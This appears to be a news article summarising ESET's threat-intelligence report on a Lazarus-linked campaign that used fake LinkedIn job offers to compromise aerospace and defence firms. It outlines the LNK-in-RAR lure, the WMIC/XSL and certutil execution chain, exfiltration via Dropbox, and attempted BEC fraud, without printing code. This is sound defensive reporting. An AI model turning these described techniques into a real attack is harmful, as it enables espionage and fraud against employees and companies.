The attackers were attempting to spy on key employees of the targeted organizations, and in some cases, threat actors were also attempting to siphon money with BEC attacks.
“At the end of last year, we discovered targeted attacks against aerospace and military companies in Europe and the Middle East, active from September to December 2019.” reads the analysis published by the experts. “A collaborative investigation with two of the affected European companies allowed us to gain insight into the operation and uncover previously undocumented malware.”
The campaign has been active between September and December 2019, ESET researchers speculate the involvement of the North Korea-linked Lazarus APT group.
The activity of the Lazarus APT group (aka HIDDEN COBRA) surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks. This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.
The attackers created fake LinkedIn accounts posing as HR representatives of well-known companies in the aerospace and defense industries (i.e. Collins Aerospace and General Dynamics).
Threat actors used fake profiles to sent job offers using LinkedIn’s messaging feature to the target individuals.
Attackers used documents related to the job offer as a lure.
“Once the contact was established, the attackers snuck malicious files into the communication, disguising them as documents related to the advertised job offer,” reads the report. “To send the malicious files, the attackers either used LinkedIn directly, or a combination of email and OneDrive. For the latter option, the attackers used fake email accounts corresponding with their fake LinkedIn personas, and included OneDrive links hosting the files.”
The attackers used password-protected RAR archive files as decoys purported to include a PDF document with details on the salary for specific job positions.
“a password-protected RAR archive containing a LNK file. When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser.”
“The shared file was a password-protected RAR archive containing a LNK file. When opened, the LNK file started a Command Prompt that opened a remote PDF file in the target’s default browser. That PDF, seemingly containing salary information for the reputed job positions, in reality served as a decoy;” continues the report. “in the background, the Command Prompt created a new folder and copied the WMI Commandline Utility (WMIC.exe) to this folder, renaming the utility in the process. Finally, it created a scheduled task, set to execute a remote XSL script periodically via the copied WMIC.exe.”
Upon gaining an initial foothold inside the target company, attackers used a custom malware downloader that downloaded a previously undocumented second-stage C++ backdoor that periodically sends requests to an attacker-controlled server, carry out pre-defined actions based on the received commands. the backdoor is also used to exfiltrate the collected data in the form of a RAR archive via a modified version of dbxcli, an open-source command-line client for Dropbox.
Experts noticed that the attackers used WMIC to interpret remote XSL scripts, certutil to decode base64-encoded downloaded payloads, and rundll32 and regsvr32 to run their custom malware.
ESET researchers also discovered that threat actors behind the Operation In(ter)ception attempted to use the compromised accounts with the target organizations to launch BEC attacks against other businesses.
The BEC attempts monitored by ESET failed because the victims contacted the compromised organizations to request additional info on their requets.
“First, leveraging existing communication in the victim’s emails, the attackers tried to manipulate a customer of the targeted company to pay a pending invoice to their bank account. For further communication with the customer, they used their own email address mimicking the victim’s.” continues the report.
“Here, the attackers were unsuccessful – rather than paying the invoice, the customer responded with inquiries about the requested sum. As the attackers urged the customer to pay, the customer ended up contacting the victim’s correct email address about the issue, raising an alarm on the victim’s side.
Additional details on the attacks, including Indicators of Compromise (IoCs) and MITRE ATT&CK techniques, are reported in the paper published by the experts.
(SecurityAffairs – Operation In(ter)reception, hacking)